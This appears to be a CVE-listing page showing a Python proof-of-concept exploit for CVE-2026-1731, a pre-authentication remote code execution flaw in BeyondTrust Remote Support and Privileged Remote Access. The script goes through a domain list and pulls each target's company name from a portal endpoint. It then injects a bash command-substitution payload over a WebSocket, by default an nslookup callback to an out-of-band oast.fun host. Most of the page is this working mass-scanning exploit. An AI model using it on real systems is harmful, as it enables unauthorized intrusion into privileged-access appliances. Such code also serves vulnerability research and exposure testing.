4837 Total CVEs
26 Years
GitHub
Home / 2026 / CVE-2026-1731
README.md
Rendering markdown...
POC / exploit.py PY
⬇ Raw GitHub ✕ Close 
#!/usr/bin/env python3

"""
Title: BeyondTrust Remote Support/Privileged Remote Access Pre-auth RCE
CVE: CVE-2026-1731
Script Author: Bipin Jitiya (@win3zz)
Script Tested on: Ubuntu 20.04.6 LTS with Python 3.8.10
Writeup: https://attackerkb.com/topics/jNMBccstay/cve-2026-1731/rapid7-analysis
"""

import asyncio
import subprocess
import requests
import re

import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# ==========================
# Command
# ==========================
CMD = "nslookup XXXXXXXXXXXXXXXXXXX.oast.fun"

# ==========================
# Verbose toggle
# ==========================
VERBOSE = False

def vprint(*args, **kwargs):
    """Verbose print helper"""
    if VERBOSE:
        print(*args, **kwargs)

# ==========================
# Read domains
# ==========================
def read_domains(path):
    with open(path, "r") as f:
        return [line.strip() for line in f if line.strip()]

# ==========================
# Fetch portal info
# ==========================
def fetch_portal_info(domain):
    for proto in ["http", "https"]:
        url = f"{proto}://{domain}/get_portal_info"
        try:
            vprint(f"Checking: {url}")
            resp = requests.get(url, timeout=3, verify=False)
            if resp.status_code == 200:
                return resp.text
        except Exception:
            continue
    return None

# ==========================
# Extract company field
# ==========================
def parse_company(body):
    m = re.search(r"company=([^;]+)", body)
    return m.group(1).strip() if m else None

# ==========================
# Websocket exploit runner - logic
# ==========================
async def websocket_action(domain, company):
    payload = (
        f'echo -ne "hax[\\$({CMD})]\\n'
        'aaaaaaaa-aaaa-aaaa-aaaaaaaaaaaa\\n0\\naaaa\\n" | '
        f'./websocat -k wss://{domain}:443/nw '
        '--protocol "ingredi support desk customer thin" '
        f'-H "X-Ns-Company: {company}" '
        '--binary --global-timeout-ms 5000 --global-timeout-force-exit -n -'
    )

    vprint(f"Command for ws action: {payload}")
    vprint(f"Running ws action for {domain}")


    proc = subprocess.Popen(
        ["bash", "-c", payload],
        stdout=subprocess.PIPE,
        stderr=subprocess.PIPE,
        text=True
    )

    out, err = proc.communicate()

    print(f"[{domain}] WebSocket output:")
    if out.strip():
        print(out)
    if err.strip():
        print("Error:", err)

# ==========================
# Main 
# ==========================
async def main():
    domains = read_domains("domains.txt")

    for domain in domains:
        print(f"\n== Checking {domain} ==")

        info = fetch_portal_info(domain)
        if not info:
            print("No portal info, skipping")
            continue

        vprint(f"Raw response: {info}")

        company = parse_company(info)
        if not company:
            print("Company not found, skipping")
            continue

        print(f"Company: {company}")
        print("Running WebSocket action...")

        try:
            await websocket_action(domain, company)
        except Exception as e:
            print(f"Error for {domain}: {e}")

# Run script
asyncio.run(main())